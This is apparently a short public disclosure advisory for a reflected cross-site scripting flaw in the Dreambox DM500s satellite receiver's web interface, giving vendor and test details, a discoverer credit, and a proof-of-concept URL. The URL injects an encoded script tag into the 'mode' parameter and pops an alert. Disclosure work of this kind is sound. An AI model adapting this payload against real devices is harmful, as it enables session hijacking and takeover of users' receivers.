DreamBox DM500s suffers from a cross site scripting vulnerability.
1fb8f30202be86e4f413656dff4cb65aee9c8bc5f7089efa996a8a1f7afdfbb2
# DreamBox DM500s Reflected XSS
# Vendor: Dream Multimedia GmbH
# Product web page: http://www.dream-multimedia-tv.de
# Summary: The Dreambox DM500s is a Linux-powered DVB satellite, terrestrial and cable digital television receivers (set-top box).
# Tested on: Linux Kernel 2.6.9, The Gemini Project, Enigma
# Vulnerability discovered by: Jay Turla (@shipcod3)
PoC:
http://192.168.1.10/body?mode=zap52b06%3Cscript%3Ealert%28%27shipcod3%27%29%3C%2fscript%3Eca184&zapmode=0&zapsubmode=4